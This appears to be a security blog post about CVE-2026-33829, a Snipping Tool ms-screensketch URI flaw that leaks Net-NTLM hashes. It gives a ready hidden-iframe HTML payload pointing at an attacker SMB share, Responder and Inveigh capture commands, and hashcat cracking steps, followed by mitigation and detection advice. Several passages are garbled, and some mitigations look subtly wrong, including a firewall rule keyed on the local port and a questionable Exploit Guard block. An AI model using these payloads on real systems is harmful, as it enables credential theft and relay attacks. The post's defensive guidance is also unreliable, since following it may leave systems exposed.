Listen to this Post
Introduction:
A newly disclosed proof-of-concept (PoC) exploit for CVE-2026-33829 demonstrates how Microsoft’s Snipping Tool can be abused to leak Net-NTLM credential hashes simply by tricking a user into clicking a malicious link. The vulnerability resides in the `ms-screensketch` deep link URI registration, which automatically triggers without user interaction beyond visiting a webpage, allowing attackers to silently capture authentication material.
Learning Objectives:
- Understand how the `ms-screensketch` protocol handler can be weaponized to initiate NTLM authentication requests.
- Learn to simulate the attack using a malicious HTML page and capture hashes with Responder or Inveigh.
- Implement effective mitigations, including registry hardening, patch management, and network monitoring.
1. Understanding the Vulnerability: `ms-screensketch` Protocol Abuse
The Windows Snipping Tool registers a custom URI scheme `ms-screensketch://` to support deep linking for features like “New Snip” or direct editing. When a browser or any application invokes this URI, Windows automatically launches the Snipping Tool. The vulnerability (CVE-2026-33829) allows an attacker to append an SMB path to this URI, forcing the Snipping Tool to attempt an authentication request to an attacker-controlled server, thereby leaking the user’s Net-NTLM hash.
Step‑by‑step guide explaining what this does and how to use it:
1. An attacker hosts a webpage containing an invisible iframe or auto-redirect to ms-screensketch://\\attacker-ip\share.
2. When a victim visits the page, Windows attempts to connect to the attacker’s SMB server.
3. The victim’s machine automatically sends a Net-NTLM hash as part of the SMB session setup.
4. The attacker captures the hash offline for cracking or relay attacks.
Example malicious HTML snippet:
<!DOCTYPE html> <html> <head><title>Loading...</title></head> <body> <iframe src="ms-screensketch://\\192.168.1.100\poc" style="display:none"></iframe> <script>window.location = "ms-screensketch://\\192.168.1.100\poc";</script> </body> </html>
Windows command to check registered protocol handlers:
reg query HKCR\ms-screensketch
Linux command to monitor incoming SMB requests (attacker side):
sudo tcpdump -i eth0 port 445 -n
2. Simulating the Attack: PoC Exploit Walkthrough
To test this vulnerability in a lab environment, set up an attacker machine running Responder (Linux) or Inveigh (Windows) to capture NTLM hashes, and a victim machine with an unpatched Windows 10/11 build.
Step‑by‑step guide:
- On attacker (Linux): Install Responder and start it in SMB listener mode.
sudo git clone https://github.com/lgandx/Responder cd Responder sudo python3 Responder.py -I eth0 -wFb
2. On attacker (Windows): Use Inveigh (PowerShell).
Import-Module .\Inveigh.psd1 Start-Inveigh -SMB Y -ConsoleOutput Y
3. On victim: Host the malicious HTML (e.g., using Python HTTP server).
python -m http.server 8080
4. Victim browses to http://attacker-ip:8080/malicious.html`.User::DOMAIN:1122334455667788:…`
5. Watch the attacker console – an NTLM hash for the victim user will appear.
<h2 style="color: yellow;">Example captured hash:</h2>
<h2 style="color: yellow;">
3. Capturing NTLM Hashes with Responder or Inveigh
Both tools automate SMB, HTTP, and LLMNR poisoning. For this specific attack, only the SMB listener is needed, but running all modules increases coverage.
Responder commands for advanced capture:
Capture hashes and write to logs sudo python3 Responder.py -I eth0 -wrfv Analyze captured hashes cat logs/Responder-Session.log
Inveigh (Windows) – real-time hash capture:
Start-Inveigh -SMB Y -LLMNR N -NBNS N -HTTP N -MachineAccounts Y Get-Inveigh -Show NTLMv1 -Unique
Cracking the hash with Hashcat:
hashcat -m 5600 captured_ntlmv2.txt /usr/share/wordlists/rockyou.txt
4. Mitigation: Disabling the `ms-screensketch` Protocol
Until Microsoft releases an official patch for CVE-2026-33829, the most effective mitigation is to disable the vulnerable URI scheme.
Step‑by‑step guide for system administrators:
1. Backup the registry key:
reg export HKCR\ms-screensketch ms-screensketch-backup.reg
2. Delete the protocol handler:
reg delete HKCR\ms-screensketch /f
3. Alternatively, set a restriction via Group Policy (Windows 10/11 Pro/Enterprise):
– Open `gpedit.msc` → Computer Configuration → Administrative Templates → System → File System → Enable “Configure SMB signing” to Require security signatures.
4. Use Windows Defender Attack Surface Reduction (ASR) rules:
Add-MpPreference -AttackSurfaceReductionRules_Ids 01443614-cd74-433a-b99e-2ecdc07bfc25 -AttackSurfaceReductionRules_Actions Enabled
This rule blocks process creations originating from web downloads that attempt to invoke SMB authentication.
5. Detection and Monitoring
Detecting exploitation attempts requires logging URI scheme invocations and outbound SMB traffic on port 445.
Step‑by‑step guide:
1. Enable command-line auditing (Event ID 4688):
auditpol /set /subcategory:"Process Creation" /success:enable /failure:enable
2. Use Sysmon to monitor for `ms-screensketch` process launches:
Install Sysmon and add a config rule:
<ProcessCreate onmatch="include"> <CommandLine condition="contains">ms-screensketch://</CommandLine> </ProcessCreate>
3. Network monitoring with Zeek (formerly Bro):
zeek -C -r capture.pcap smb.log grep "ntlm" smb.log
4. Windows firewall rule to block outbound SMB to untrusted IPs:
New-NetFirewallRule -DisplayName "Block SMB Outbound to External" -Direction Outbound -Protocol TCP -LocalPort 445 -Action Block
6. Broader Implications: URI Handler Security
This vulnerability highlights a recurring class of flaws where custom URI handlers (like ms-screensketch, zoommtg, skype) can be abused to trigger network authentication or local application behavior without user consent.
Step‑by‑step guide to audit custom URI schemes on Windows:
1. List all registered protocols:
reg query HKCR /f "URL Protocol" /s | findstr "HKEY_CLASSES_ROOT"
2. For each suspicious handler, test with a simple HTML page:
<a href="custom-scheme://\\attacker-ip\test">Click</a>
3. Remove or restrict any handler that allows SMB, FILE, or command injection.
Linux equivalent (xdg-open):
xdg-mime query default x-scheme-handler/custom-scheme
7. Patch and Update Management
Microsoft is expected to release an out-of-band or monthly patch for CVE-2026-33829. Administrators should prioritize deployment.
Step‑by‑step guide:
1. Check current patch level:
wmic qfe list brief /format:texttable
2. Enable automatic updates or use WSUS to approve the specific KB.
3. After patching, re-verify the protocol handler behavior:
start ms-screensketch://\localhost\test
(Should either fail or prompt for confirmation instead of auto-authenticating.)
Temporary workaround via Windows Defender Exploit Guard:
Add-MpPreference -ExploitProtectionSettings @" <Rule> <Name>Block ms-screensketch SMB</Name> <Protocol>ms-screensketch</Protocol> <Action>Block</Action> </Rule> "@
What Undercode Say:
- Key Takeaway 1: Native Windows tools can become attack vectors when they expose custom URI handlers without proper validation – Snipping Tool’s convenience feature turned into a credential harvester.
- Key Takeaway 2: Net-NTLM hashes remain a high-value target because they can be relayed or cracked offline; disabling SMB outbound to the internet and using SMB signing are essential defense-in-depth measures.
- Analysis: The release of a PoC exploit dramatically lowers the barrier for script kiddies and red teams. While Microsoft will patch this, many enterprises lag weeks or months behind. The real lesson is that default URI handlers should never trigger network authentication without explicit user consent. Security teams must inventory all custom schemes and apply least privilege – if the Snipping Tool doesn’t need SMB access, block it via firewall or registry. Expect a surge in similar URI handler vulnerabilities across other Windows and macOS applications in the coming months.
Prediction:
CVE-2026-33829 will be weaponized within 7 days in phishing campaigns that masquerade as “screenshot verification” emails. Attackers will combine this with LLMNR/NetBIOS poisoning to relay hashes to high-value targets like file servers or Exchange. Over the next year, look for a new class of “protocol handler smuggling” attacks where malicious deep links chain multiple schemes (e.g., `ms-screensketch://` + `file://` + cmd://) to achieve remote code execution. Enterprises that fail to implement ASR rules and outbound SMB filtering will face increased incidents of credential dumping and lateral movement. Microsoft will likely introduce a “Confirm before sending NTLM over custom URI” prompt in a future Windows release, but until then, the onus is on defenders to disable the protocol.
▶️ Related Video (76% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Cybersecuritynews Share – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
